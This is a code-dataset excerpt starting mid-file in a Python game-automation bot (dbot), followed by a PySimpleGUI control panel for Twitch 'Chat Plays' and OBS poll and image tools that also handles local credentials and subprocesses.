self.config.password,\n })\n\n def on_signedIn(\n self,\n e: events.SignedIn,\n ) -> None:\n self.socket.send_keypress('enter')\n\n def on_startCharacterSelect(\n self,\n e: events.StartCharacterSelect,\n ) -> None:\n options = self.state.vars.get('selectableCharacters', [])\n if len(options) == 0:\n raise NotImplementedError('character creation')\n\n index = self.pick_character([\n (str(o['class']), int(o['level']))\n for o in options\n ])\n assert index < len(options)\n # TODO: other char's ui positions\n self.socket.send_click(*UIPositions.CHARACTER_ONE)\n\n def on_playerSignedIn(\n self,\n e: events.PlayerSignedIn,\n ) -> None:\n self.state.add_player(e.player)\n\n def on_playerPreviouslySignedIn(\n self,\n e: events.PlayerPreviouslySignedIn,\n ) -> None:\n for player in e.players:\n self.state.add_player(player)\n\n def on_joinMap(\n self,\n e: events.JoinMap,\n ) -> None:\n self.state.join_map(e.map_name)\n if self.stopped_at_leave_map and self.current_action is None:\n self.say(f'stopped at {e.map_name}', 'wsay')\n self.stopped_at_leave_map = False\n\n def on_leaveMap(\n self,\n e: events.LeaveMap,\n ) -> None:\n if self.mover.clear_goto():\n self.stopped_at_leave_map = True\n self.state.left_map()\n\n def on_playerLeftMap(\n self,\n e: events.PlayerLeftMap,\n ) -> None:\n self.state.left_map(e.username)\n\n #\n # movement\n #\n\n def on_movePlayer(\n self,\n e: events.MovePlayer,\n ) -> None:\n # note: This method only updates player position in game stae,\n # any logic about how this affects this bots movement is\n # in movement.MovementController.on_movePlayer\n player = self.state.get_player(e.username)\n if player is None:\n logging.warning(f'missing player moved: ${e.username}')\n return\n\n if e.direction == Direction.down:\n player['coords']['y'] += 1\n if e.direction == Direction.up:\n player['coords']['y'] -= 1\n if e.direction == Direction.left:\n player['coords']['x'] -= 1\n if e.direction == Direction.right:\n player['coords']['x'] += 1\n\n # TODO: make this not bad\n action = self.current_action\n if action is not None and isinstance(action, MapAction):\n action.on_movePlayer(e)\n\n def on_bonk(\n self,\n e: events.Bonk,\n ) -> None:\n self.mover.on_bonk(e)\n\n #\n # battle\n #\n\n def on_startBattle(\n self,\n e: events.StartBattle,\n ) -> None:\n self.battle = Battle()\n self.battler.start()\n\n def on_leaveBattle(\n self,\n e: events.LeaveBattle,\n ) -> None:\n self.battler.leave()\n self.battle = None\n\n #\n # chat\n #\n\n def on_message(\n self,\n e: events.Message,\n ) -> None:\n try:\n self.commands.handle(e)\n except Exception as e:\n logging.warning(f'exception parsing command: {e}')\n traceback.print_exc()\n\n #\n # party\n #\n\n def on_party(\n self,\n e: events.Party,\n ) -> None:\n # TODO: do verification based on party id?\n if self.name in e.party:\n self.party.update_party(e.party)\n\n #\n # var updates\n #\n\n def onupdate_statsPrompted(\n self,\n prompted: bool,\n ) -> None:\n if prompted and self.report_state == 'waiting on stats':\n self.report_state = 'waiting on gold'\n self.socket.send_click(*UIPositions.INVENTORY_BUTTON)\n\n def onupdate_inventoryPrompted(\n self,\n prompted: bool,\n ) -> None:\n if prompted and self.report_state == 'waiting on gold':\n self.report_state = 'none'\n self.socket.send_click(*UIPositions.INVENTORY_BUTTON)\n self.report()\n\n #\n # convenience methods\n # and command implementations\n #\n\n def say(\n self,\n message: str,\n channel = 'say',\n ) -> None:\n self.socket.send_message(channel, message)\n\n def goto(\n self,\n path: List[Point],\n ) -> None:\n logging.debug(f'new route: {path}')\n self.mover.goto(list(path))\n\n def logout(self) -> None:\n self.clear_actions()\n self.socket.send_logout()\n self.logging_out = True\n\n def report(\n self,\n prompt = '',\n ) -> None:\n gold = sum([\n int(self.state.vars.get('gold', 0)),\n int(self.state.vars.get('bankedGold', 0)),\n ])\n level = str(self.me.get('level', 0))\n self.say(f\"I'm {prompt}level {level}, {gold} gold\", self.report_channel)\n self.report_state = 'none'\n\n def check_stats_and_report(\n self,\n channel = 'wsay',\n ) -> None:\n self.report_channel = channel\n if self.is_in_battle:\n self.report('in battle, ')\n elif self.report_state == 'none':\n self.report_state = 'waiting on stats'\n self.socket.send_click(*UIPositions.STATS_BUTTON)\n\n def join_party(\n self,\n party: List[str],\n ) -> None:\n self.party.set_target(party)\n self.enqueue_action(PartyAction(self))\n\n def grind(\n self,\n target: GrindTarget,\n ) -> None:\n self.enqueue_action(GrindAction(self, target))\n\n def start_mapping(\n self,\n focus: Optional[str] = None,\n ) -> None:\n self.enqueue_action(MapAction(self, focus_map=focus))\n\n def stop(self) -> None:\n self.mover.clear_goto()\n self.clear_actions()\n\n #\n # ui interface\n #\n\n def click_at_tile(\n self,\n x: int,\n y: int,\n ) -> None:\n me = self.state.players[self.name]\n screen_x = 150 - (me['coords']['x'] - x) * 16\n screen_y = 120 - (me['coords']['y'] - y) * 16\n self.socket.send_click(screen_x, screen_y)\n\n #\n # for override\n #\n\n def pick_character(\n self,\n characters: List[Tuple[str, int]],\n ) -> int:\n return 0\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('botname')\n parser.add_argument('--config', type=str, default='config.json')\n parser.add_argument('--nerror', type=int, default=0)\n args = parser.parse_args()\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n config = BotConfig.from_file(args.config, args.botname)\n bot = BasicBot(config)\n bot.run_forever()\n","repo_name":"snwhd/dbot","sub_path":"dbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"29018909138","text":"'''\nThis is the main file for the user interface.\n'''\nimport os\nimport subprocess\nimport sys\nimport threading\nfrom json import JSONDecodeError\n\nimport PySimpleGUI as sg\nimport psutil\nimport pydirectinput\nfrom jsonschema import ValidationError\nfrom pyuac import main_requires_admin\n\nfrom streamchatwars._shared.constants import RANDOM_ACTIONS_FILE, ACCEPT_INPUT_FILE, DEFAULT_CREDENTIAL_FILE\nfrom streamchatwars._shared.global_data import GlobalData\nfrom streamchatwars._shared.types import CredentialDict, TwitchChatCredentialDict, ConfigDict\nfrom streamchatwars.config import json_utils\nfrom streamchatwars.config.config import read_json_configs, IRC_Settings, extract_irc_settings\nfrom streamchatwars.config.json_utils import InvalidCredentialsError\nfrom streamchatwars.events.events_states import GlobalEventStates\nfrom userinterface import games, obsplugin\n\nallowed_file_types = ((\"Image Files\", \"*.png\"), (\"Image Files\", \"*.jpg\"), (\"Image Files\", \"*.jpeg\"),\n (\"Image Files\", \"*.webp\"), (\"Image Files\", \"*.gif\"))\n\n\n@main_requires_admin\ndef main():\n check_directories()\n this = GUI()\n this.__init__()\n\n\ndef check_directories():\n if not os.path.exists('userinterface/images'):\n os.makedirs('userinterface/images')\n if not os.path.exists('userinterface/pokemon'):\n os.makedirs('userinterface/pokemon')\n\n\ndef main_layout():\n return [\n [sg.Text('Stream Extensions Control', justification='center', font=(\"Helvetica\", 30), size=(800, 1))],\n [sg.HSeparator()],\n # Selector for Chat Picks and Stream Chat Wars\n [sg.Column(layout=[\n [sg.Frame(title='Select which Control Panel to run', title_color='orange', relief=sg.RELIEF_SUNKEN,\n element_justification='center', key='select_control_panel', vertical_alignment='center',\n layout=[\n [sg.Button('Chat Picks', font=\"Helvetica\", key='chat_picks',\n button_color=('white', 'gold'),\n border_width=3),\n sg.Button('Chat Plays', font=\"Helvetica\", key='stream_chat_wars',\n button_color=('white', 'gold'),\n border_width=3)],\n [sg.Button('Reset credentials', font=\"Helvetica\", key='reset_credentials',\n button_color=('white', 'red'), border_width=3)],\n ])],\n [sg.Button('Exit', font=\"Helvetica\", key='Exit', button_color=('white', 'red'),\n border_width=3)]\n ], justification='center', element_justification='center', vertical_alignment='center')],\n\n ]\n\n\ndef chat_picks_layout():\n return [\n [sg.Text('Chat Picks Control Panel', justification='center', font=(\"Helvetica\", 30), size=(800, 1),\n relief=sg.RELIEF_RIDGE, key='title', text_color='white', background_color='blue', border_width=3)],\n [sg.HSeparator()],\n # Chat Picks Control Panel Frame\n [sg.Column(layout=[\n [sg.Frame(title=\"Main Controls\", layout=[\n [sg.Button('Start OBS Connection', font=\"Helvetica\", key='start_webserver',\n button_color=('white', 'green'), ),\n sg.Button('Stop OBS Connection', font=\"Helvetica\", key='stop_webserver',\n button_color=('white', 'red'), )],\n # [sg.Button('TestButton', font=\"Helvetica\", key='test_button', button_color=('white', 'green'), )],\n ], element_justification='center', title_location='n')],\n [sg.Column(layout=[\n [sg.Column(layout=[\n [sg.Frame(title='OBS Setup', layout=setup_obs_inner_layout(),\n element_justification='center', title_location='n')]], key='obs_setup', visible=False),\n sg.Column(layout=[\n [sg.Frame(title='Controls', layout=controls_layout(), element_justification='center',\n title_location='n')]], key='controls',\n visible=False)],\n ])],\n [sg.Text(\n 'Do not adjust the sources created by the program. They are used for the program to work and will not function properly without them.'\n '\\nYou can change the position of the sources in OBS but don\\'t change the name or properties of the sources.',\n text_color='red', font=(\"Helvetica\", 8), justification='center')],\n [sg.HSeparator()],\n [sg.Button('Main Menu', font=\"Helvetica\", key='Main_Menu', button_color=('white', 'red'),\n border_width=3), ]\n ], justification='center', element_justification='center', vertical_alignment='center')],\n ]\n\n\ndef setup_obs_inner_layout():\n return [\n [sg.Text('Select OBS Scene: ', font=(\"Helvatica\", 15)),\n sg.Combo(default_value='none', key='selected_scene',\n font=(\"Helvetica\", 12), size=(18, 1), values=[])],\n [sg.Text('Twitch Username:', font=(\"Helvetica\", 15)),\n sg.Input(key='streamer_name', font=(\"Helvetica\", 12), size=(18, 1), )],\n [sg.Button('Setup OBS', font=\"Helvetica\", key='setup_obs', button_color=('white', 'green'), )],\n ]\n\n\ndef controls_layout():\n return [\n [sg.Text('Scene with Setup: ', font=(\"Helvatica\", 15), key='scene_with_setup'),\n sg.Text('None', key='scene_setup', font=(\"Helvatica\", 15), text_color='red'),\n sg.Button('Go to Scene', font=\"Helvetica\", key='go_to_scene', button_color=('white', 'green'), )],\n [sg.Text('Current Scene:', font=(\"Helvatica\", 15), key='current_scene'),\n sg.Text('None', key='scene_text', font=(\"Helvatica\", 15), text_color='red'), ],\n [sg.Frame(title='Image Controls', layout=[\n [sg.Button('Show Image', font=\"Helvetica\", key='set_visible', button_color=('white', 'green'), ),\n sg.Button('Hide Image', font=\"Helvetica\", key='set_invisible', button_color=('white', 'red'), )],\n [sg.Text('Enter image URL: '),\n sg.InputText(key='-FILEIN-', size=(20, 1)), ],\n [sg.Button('Upload', key='upload_image'),\n sg.Button('Clear Image', key='clear_image', button_color=('white', 'red'), )],\n ], element_justification='center', title_location='n')],\n [sg.Frame(title='Poll Controls', layout=[\n [sg.Text('Poll Status: ', font=(\"Helvatica\", 15), key='poll_status'),\n sg.Text('', key='poll_status_text', )],\n [sg.Button('Enable Poll', font=\"Helvetica\", key='enable_poll', button_color=('white', 'green'), ),\n sg.Button('Disable Poll', font=\"Helvetica\", key='disable_poll', button_color=('white', 'red'), )],\n [sg.Button('Show Poll', font=\"Helvetica\", key='show_poll', button_color=('white', 'green'), ),\n sg.Button('Hide Poll', font=\"Helvetica\", key='hide_poll', button_color=('white', 'red'), )],\n [sg.Button('Reset Poll', font=\"Helvetica\", key='reset_poll', button_color=('white', 'red'), ), ]\n ], element_justification='center', title_location='n')],\n [sg.Button('Remove OBS Sources', font=\"Helvetica\", key='remove_sources', button_color=('white', 'red'), )],\n ]\n\n\ndef stream_chat_wars_layout():\n return [\n [sg.Text('Chat Plays Control Panel', justification='center', font=(\"Helvetica\", 30), size=(800, 1),\n relief=sg.RELIEF_RIDGE, key='title', text_color='white', background_color='blue', border_width=3)],\n [sg.HSeparator()],\n # Input Server Controls Frame\n [sg.Column(layout=[\n [sg.Frame(title=\"Main Controls\", layout=[\n [sg.Column(layout=[\n [sg.Frame(title='Input Server Controls', title_color='Orange', relief=sg.RELIEF_SUNKEN,\n title_location='n', key='input_server_controls',\n layout=[\n [sg.Text('Controls for the Input Server')],\n [sg.Button('Start Input Server', font=\"Helvetica\", key='start_input_server',\n button_color=('white', 'green'),\n border_width=3)],\n [sg.Button('Stop Input Server', font=\"Helvetica\", key='stop_input_server',\n button_color=('white', 'red'),\n border_width=3)]\n ], element_justification='center')],\n ], justification='center'),\n\n # Chat Wars Controls Frame\n sg.Frame(title='Chat Plays Controls', title_color='orange', relief=sg.RELIEF_SUNKEN,\n title_location='n', key='stream_chat_wars_controls', layout=[\n [sg.Text('Select a game:', font=(\"Helvetica\", 15)),\n sg.Combo(games.get_game_names(), default_value='none', key='selected_game',\n font=(\"Helvetica\", 12), size=(18, 1))],\n [sg.Button('Start Chat plays', font=\"Helvetica\", key='start_stream_chat_wars',\n button_color=('white', 'green'),\n border_width=3)],\n [sg.Button('Stop Chat Plays', font=\"Helvetica\", key='stop_stream_chat_wars',\n button_color=('white', 'red'),\n border_width=3)]\n ], element_justification='center')\n ],\n [sg.Frame(title='Input Switches', title_color='orange', relief=sg.RELIEF_SUNKEN, key='input_switches',\n layout=[\n [sg.Text('Accept Chat Input:', font=(\"Helvetica\", 15), key='chat_input_status'),\n sg.Button('On', font=\"Helvetica\", key='accept_chat_input_on',\n button_color=('white', 'green'), border_width=3),\n sg.Button('Off', font=\"Helvetica\", key='accept_chat_input_off',\n button_color=('white', 'red'), border_width=3)],\n [sg.Text('Random Inputs:', font=(\"Helvetica\", 15), key='random_inputs_status'),\n sg.Button('On', font=\"Helvetica\", key='random_inputs_on',\n button_color=('white', 'green'), border_width=3),\n sg.Button('Off', font=\"Helvetica\", key='random_inputs_off',\n button_color=('white', 'red'), border_width=3)],\n [sg.Text('Reset Teams:', font=(\"Helvetica\", 15), key='reset_teams_text'),\n sg.Button('Reset', font=\"Helvetica\", key='reset_teams', button_color=('white', 'red'),\n border_width=3)],\n ], title_location='n'),\n sg.Frame(title='Chat Wars Controls', title_color='orange', relief=sg.RELIEF_SUNKEN,\n key='chat_wars_controls',\n layout=[\n [sg.Text('Failsafe Hotkey:', font=(\"Helvetica\", 15), key='failsafe_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='failsafe_hotkey')],\n [sg.Text('Chat Input Hotkey:', font=(\"Helvetica\", 15), key='chat_input_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='chat_input_hotkey')],\n [sg.Text('Random Inputs Hotkey:', font=(\"Helvetica\", 15),\n key='random_inputs_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='random_inputs_hotkey')],\n [sg.Text('Reset Teams Hotkey:', font=(\"Helvetica\", 15), key='reset_teams_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='reset_teams_hotkey')],\n ], title_location='n')\n ],\n [\n sg.Frame(title='Status Panel', title_color='orange', relief=sg.RELIEF_SUNKEN, key='status_panel',\n layout=[\n # Input Server Status\n [sg.Text('Input Server Status:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='input_status', text_color='red')],\n # Stream Chat Wars Status\n [sg.Text('Chat Plays Status:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='stream_chat_wars_status', text_color='red')],\n # Chat Input Status\n [sg.Text('Chat Input:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='chat_input', text_color='red')],\n # Random Inputs Status\n [sg.Text('Random Inputs:', font=(\"Helvetica\", 15)),\n sg.Text(('Off' if GlobalEventStates.state_random_action is False else 'On'),\n key='random_inputs', text_color='red')],\n ], title_location='n'),\n ],\n ], title_location='n', element_justification='center', vertical_alignment='center', key='main_controls',\n relief=sg.RELIEF_SUNKEN)],\n [sg.HSeparator()],\n [sg.Button('Main Menu', font=\"Helvetica\", key='Menu', button_color=('white', 'red'),\n border_width=3), ]\n ], justification='center', element_justification='center', vertical_alignment='center')]\n ]\n\n\ndef login_layout():\n return [\n\n [sg.Text('Twitch Login', justification='center', font=(\"Helvetica\", 30), size=(800, 1))],\n [sg.Text('WHATEVER YOU DO DONT EVER SHOW THIS ON STREAM!!', justification='center', font=(\"Helvetica\", 15),\n text_color='red', size=(800, 1))],\n [sg.HSeparator()],\n [sg.Column(layout=[\n [sg.Frame(title='Login', title_location='n', title_color='purple', relief=sg.RELIEF_SUNKEN,\n key='twitch_login', layout=[\n [sg.Text('Bot Username:', font=(\"Helvetica\", 15)),\n sg.InputText(key='bot_username', font=(\"Helvetica\", 15), size=(20, 1))],\n [sg.Text('Bot OAuth:', font=(\"Helvetica\", 15)),\n sg.InputText(key='bot_oauth', font=(\"Helvetica\", 15), size=(30, 1), password_char='*')],\n [sg.Text('Twitch API Client ID: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='twitch_api_client_id', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('Twitch API Client Secret: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='twitch_api_client_secret', font=(\"Helvetica\", 15), size=(30, 1),\n password_char='*')],\n [sg.Text('OBS Websocket Host: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_websocket_host', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('OBS Websocket Port: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_websocket_port', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('OBS Poll Address: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='obs_poll_address', font=(\"Helvetica\", 15), size=(20, 1))],\n [sg.Button('Login', font=\"Helvetica\", key='bot_login', button_color=('white', 'green'))],\n ], vertical_alignment='center', element_justification='center')],\n [sg.Button('Exit', font=\"Helvetica\", key='Exit_1', button_color=('white', 'red'),\n border_width=3)]\n ], justification='center', vertical_alignment='center', element_justification='center')]\n ]\n\n\ndef remove_temp_files():\n if os.path.exists(ACCEPT_INPUT_FILE):\n os.remove(ACCEPT_INPUT_FILE)\n if os.path.exists(RANDOM_ACTIONS_FILE):\n os.remove(RANDOM_ACTIONS_FILE)\n\n\nOBS_HOST = \"\"\nOBS_PORT = None\nOBS_WEBSERVER = \"\"\n\n\ndef set_values(host, port, webserver):\n global OBS_HOST, OBS_PORT, OBS_WEBSERVER\n OBS_HOST = host\n OBS_PORT = port\n OBS_WEBSERVER = webserver\n\n\ndef is_obs_running():\n for proc in psutil.process_iter():\n try:\n if proc.name().lower() == 'obs64.exe':\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef is_gba_emulator_running():\n for proc in psutil.process_iter():\n try:\n if proc.name().lower() == 'visualboyadvance-m.exe':\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\ndef check_login_values(values):\n if values['bot_username'] == '':\n return False\n elif values['bot_oauth'] == '':\n return False\n elif values['twitch_api_client_id'] == '':\n return False\n elif values['twitch_api_client_secret'] == '':\n return False\n elif values['obs_websocket_host'] == '':\n return False\n elif values['obs_websocket_port'] == '':\n return False\n elif values['obs_poll_address'] == '':\n return False\n return True\n\n\nclass GUI:\n config: ConfigDict\n credentials: CredentialDict\n channel_set: set[str]\n\n def __init__(self):\n \"\"\"\n Here is the list of layouts that are used in the GUI\n \"\"\"\n self.status_panel_thread = threading.Thread(target=self.update_status_panel, args=())\n self.status_panel_thread.daemon = True\n\n self.current_layout = None # Current used layout\n self.layout_list = [] # List of all layouts\n ##########################################################\n '''\n Here is the list of variables that are used in the GUI\n '''\n\n self.input_server_started = False\n self.input_server_process = None\n self.stream_chat_wars_started = False\n self.stream_chat_wars_process = None\n self.obs_hook = None\n ##########################################################\n sg.theme('DarkAmber')\n sg.set_options(font=(\"Helvetica\", 15))\n sg.theme_input_background_color('black')\n sg.theme_input_text_color('white')\n\n self.load_layouts()\n self.current_layout = 'Main'\n self.__main__()\n\n def load_layouts(self):\n self.layout_list = [[sg.Column(main_layout(), key=f'-COL_Main-'),\n sg.Column(stream_chat_wars_layout(), visible=False, key=f'-COL_Stream_Chat_Wars-'),\n sg.Column(chat_picks_layout(), visible=False, key=f'-COL_Chat_Picks-'),\n sg.Column(login_layout(), visible=False, key=f'-COL_Login-')]\n ]\n\n def __main__(self):\n self.window = sg.Window('Stream Extensions', self.layout_list, size=(800, 700), finalize=True,\n icon='userinterface/icon.ico')\n self.status_panel_thread.start()\n\n self.check_twitch_credentials() # Check if twitch credentials are present\n # self.validate_credentials() # Validate Twitch Credentials\n\n while True:\n event, values = self.window.read(timeout=1000)\n if event == sg.WIN_CLOSED or event == 'exit' or event == 'Exit' or event == 'Exit_1': # Exit\n print('Shutting down...')\n print('Closing all processes...')\n if self.stream_chat_wars_started:\n print('Stopping Stream Chat Wars Server...')\n self.stop_stream_chat_wars_server()\n print('Stream Chat Wars Server Stopped')\n if self.input_server_started:\n print('Stopping Input Server...')\n self.stop_input_server()\n print('Input Server Stopped')\n if self.obs_hook is not None:\n print('Disconnecting from OBS...')\n self.obs_hook.close_connection()\n print('Disconnected from OBS')\n print('Removing temporary files...')\n remove_temp_files()\n print('Exiting...')\n exit(0)\n elif event == 'Menu' or event == 'Main_Menu': # Main Menu\n self.update_current_layout('Main')\n pass\n elif event == 'chat_picks': # Chat Picks\n self.update_current_layout('Chat_Picks')\n elif event == 'bot_login': # Twitch Login\n if check_login_values(values):\n self.set_new_credentials(values)\n elif event == 'start_webserver':\n # if not is_obs_running():\n # sg.popup('OBS is not running, please start OBS first')\n # pass\n # else:\n self.obs_hook = obsplugin.start_connection()\n self.window['selected_scene'].update(values=self.obs_hook.get_obs_scenes(), value='none')\n if not self.obs_hook.is_obs_setup():\n self.window['obs_setup'].update(visible=True)\n self.window['controls'].update(visible=False)\n else:\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=True)\n self.window['scene_setup'].update(self.obs_hook.get_scene())\n elif event == 'stop_webserver':\n if self.obs_hook is not None:\n self.stop_obs_server()\n elif event == 'reset_credentials':\n os.remove(DEFAULT_CREDENTIAL_FILE)\n self.check_twitch_credentials()\n elif event == 'test_button':\n if self.obs_hook is not None:\n self.obs_hook.test_function()\n elif event == 'setup_obs':\n if values['selected_scene'] != 'none' and values['streamer_name'] != '':\n self.obs_hook.setup_obs(values['selected_scene'], values['streamer_name'])\n self.window['obs_setup'].update(visible=False)\n self.window['controls'].update(visible=True)\n self.window['scene_setup'].update(self.obs_hook.get_scene())\n elif event == 'go_to_scene':\n self.obs_hook.swap_to_scene()\n elif event == 'set_visible':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(True, self.obs_hook.image_source_name)\n elif event == 'set_invisible':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(False, self.obs_hook.image_source_name)\n elif event == 'show_poll':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(True, self.obs_hook.poll_source_name)\n elif event == 'hide_poll':\n if self.obs_hook is not None:\n self.obs_hook.set_scene_visibity(False, self.obs_hook.poll_source_name)\n elif event == 'upload_image':\n self.obs_hook.set_image(values['-FILEIN-'])\n elif event == 'clear_image':\n self.obs_hook.set_image('')\n elif event == 'enable_poll':\n self.obs_hook.enable_poll()\n elif event == 'disable_poll':\n self.obs_hook.disable_poll()\n elif event == 'reset_poll':\n self.obs_hook.reset_poll()\n elif event == 'remove_sources':\n self.obs_hook.remove_sources()\n self.window['obs_setup'].update(visible=True)\n self.window['controls'].update(visible=False)\n elif event == 'stream_chat_wars': # Stream Chat Wars\n self.update_current_layout('Stream_Chat_Wars')\n elif event == 'start_input_server': # Start Input Server\n self.start_input_server()\n elif event == 'stop_input_server': # Stop Input Server\n self.stop_input_server()\n elif event == 'start_stream_chat_wars': # Start Stream Chat Wars\n self.start_stream_chat_wars_server(values)\n elif event == 'stop_stream_chat_wars': # Stop Stream Chat Wars\n self.stop_stream_chat_wars_server()\n elif event == 'accept_chat_input_on': # Start Chat Input\n if not os.path.exists(ACCEPT_INPUT_FILE):\n print('Enabling Chat Input')\n open(ACCEPT_INPUT_FILE, 'x')\n elif event == 'accept_chat_input_off': # Stop Chat Input\n if os.path.exists(ACCEPT_INPUT_FILE):\n print('Disabling Chat Input')\n os.remove(ACCEPT_INPUT_FILE)\n elif event == 'random_inputs_on': # Random Inputs\n print('Enabling Random Inputs')\n if not os.path.exists(RANDOM_ACTIONS_FILE):\n open(RANDOM_ACTIONS_FILE, 'x')\n elif event == 'random_inputs_off': # Random Inputs\n print('Disabling Random Inputs')\n if os.path.exists(RANDOM_ACTIONS_FILE):\n os.remove(RANDOM_ACTIONS_FILE)\n elif event == 'reset_teams': # Reset Teams\n print('Resetting Teams')\n pydirectinput.press(self.config.get(\"events\").get(\"hotkeys\").get(\"reset_teams\", 'F15').lower())\n\n def start_input_server(self):\n if not self.input_server_started:\n print('Starting Input Server...')\n self.input_server_process = subprocess.Popen('python -m input_server'.split(),\n stderr=subprocess.PIPE)\n else:\n sg.popup('Input Server already started.')\n\n def stop_input_server(self):\n if self.input_server_started:\n print('Stopping Input Server...')\n subprocess.call(['taskkill', '/F', '/T', '/PID', str(self.input_server_process.pid)])\n else:\n sg.popup('Input Server not started.')\n\n def start_stream_chat_wars_server(self, values):\n if self.input_server_started:\n if not self.stream_chat_wars_started:\n game = values['selected_game']\n if game != 'none':\n selected_config = games.get_selected_game_config(game)\n self.config, self.credentials = read_json_configs(selected_config)\n print('Starting Stream Chat Wars for ' + game + '...')\n self.stream_chat_wars_process = subprocess.Popen(\n ['python', '-m', 'streamchatwars', selected_config],\n stdin=subprocess.PIPE)\n\n if game == games.GAME_POKEMON_FIRE_RED['name']:\n if not is_gba_emulator_running():\n os.startfile(\"userinterface\\\\pokemon\\\\Pokemon_FireRed.gba\")\n else:\n sg.popup('Please select a game to run Chat Plays for.')\n else:\n sg.popup('Please start the Input Server first.')\n\n def stop_stream_chat_wars_server(self):\n if self.stream_chat_wars_started:\n print('Stopping Stream Chat Wars...')\n subprocess.call('taskkill /F /T /PID ' + str(self.stream_chat_wars_process.pid))\n self.window['stream_chat_wars_status'].update('Stopped', text_color='red')\n else:\n sg.popup('Chat Plays not started.')\n\n def update_current_layout(self, layout):\n self.window[f'-COL_{self.current_layout}-'].update(visible=False)\n self.current_layout = layout\n self.window[f'-COL_{self.current_layout}-'].update(visible=True)\n\n def check_process_state(self): # Check if the servers are running\n if self.input_server_started: # Check if the Input Server is running\n if self.input_server_process.poll() is None:\n print('Input Server is running.')\n else:\n print(self.input_server_process.poll())\n print('Input Server is not running.')\n\n if self.stream_chat_wars_started: # Check if the Stream Chat Wars is running\n if self.stream_chat_wars_process.poll() is None:\n print('Stream Chat Wars is running.')\n else:\n print(self.stream_chat_wars_process.poll())\n print('Stream Chat Wars is not running.')\n\n def check_twitch_credentials(self):\n config_arg: str | None = sys.argv[1] if len(sys.argv) > 1 else None\n credentials_arg: str | None = sys.argv[2] if len(sys.argv) > 2 else None\n try:\n self.config, self.credentials = read_json_configs(config_arg, credentials_arg)\n print(\"Credentials file exists, checking credentials...\")\n self.validate_credentials()\n except (OSError, JSONDecodeError, ValidationError):\n self.config, self.credentials = read_json_configs()\n self.update_current_layout('Login')\n # sg.popup(\"Invalid Twitch Chat credentials found. Go yell at thundercookie15 to send you new ones.\")\n\n def validate_credentials(self) -> None | bool:\n chat_credentials: TwitchChatCredentialDict | None\n chat_credentials = self.credentials.get(\"TwitchChat\", None)\n\n if not chat_credentials:\n print(\"No Twitch chat credentials provided.\")\n sg.popup(\"No Twitch Chat credentials found. Go yell at thundercookie15 to send you new ones.\")\n return False\n try:\n self.channel_set: set[str] = set()\n for team in GlobalData.Teams.get_all_teams():\n self.channel_set.update(team.channels)\n irc_setting: IRC_Settings = extract_irc_settings(self.config, chat_credentials, self.channel_set)\n username = irc_setting.username\n oauth = irc_setting.oauth_token\n host = self.credentials.get(\"OBS\", {}).get(\"host\").get(\"value\")\n port = self.credentials.get(\"OBS\", {}).get(\"port\").get(\"value\")\n webserver = self.credentials.get(\"OBS\", {}).get(\"webserver\").get(\"value\")\n if username == \"YOUR_BOT_USERNAME_LOWERCASE\" or oauth == \"YOUR_BOT_OAUTH_TOKEN\":\n raise InvalidCredentialsError\n set_values(host, port, webserver)\n print('Credentials validated...')\n self.update_current_layout('Main')\n except InvalidCredentialsError:\n sg.popup(\"Invalid Twitch Chat credentials found. Go yell at thundercookie15 to send you new ones.\")\n self.update_current_layout('Login')\n return False\n\n def set_new_credentials(self, values):\n username = values['bot_username']\n oauth = values['bot_oauth']\n client_id = values['twitch_api_client_id']\n client_secret = values['twitch_api_client_secret']\n obs_host = values['obs_websocket_host']\n obs_port = values['obs_websocket_port']\n obs_poll_address = values['obs_poll_address']\n self.credentials.get(\"TwitchChat\").get(\"username\").update({\"value\": username})\n self.credentials.get(\"TwitchChat\").get(\"oauth_token\").update({\"value\": oauth})\n self.credentials.get(\"TwitchAPI\").get(\"client_id\").update({\"value\": client_id})\n self.credentials.get(\"TwitchAPI\").get(\"client_secret\").update({\"value\": client_secret})\n self.credentials.get(\"OBS\").get(\"host\").update({\"value\": obs_host})\n self.credentials.get(\"OBS\").get(\"port\").update({\"value\": obs_port})\n self.credentials.get(\"OBS\").get(\"webserver\").update({\"value\": obs_poll_address})\n json_utils.write_credentials_file(self.credentials, DEFAULT_CREDENTIAL_FILE)\n self.check_twitch_credentials()\n\n def update_status_panel(self):\n while True:\n if self.current_layout == 'Chat_Picks':\n if self.obs_hook is not None:\n if self.obs_hook.is_obs_setup:\n if self.obs_hook.get_poll_status().get('active'):\n self.window['poll_status_text'].update('Active', text_color='green')\n else:\n self.window['poll_status_text'].update('Inactive', text_color='red')\n if not self.obs_hook.get_current_scene() == self.obs_hook.get_scene():\n self.window['go_to_scene'].update(visible=True)\n else:\n self.window['go_to_scene'].update(visible=False)\n self.window['scene_text'].update(self.obs_hook.get_current_scene())\n if self.current_layout == 'Stream_Chat_Wars':\n if self.input_server_process is not None:\n if self.input_server_process.poll() is None:\n self.input_server_started = True\n else:\n self.input_server_started = False\n if self.input_server_started:\n self.window['input_status'].update('Running', text_color='green')\n 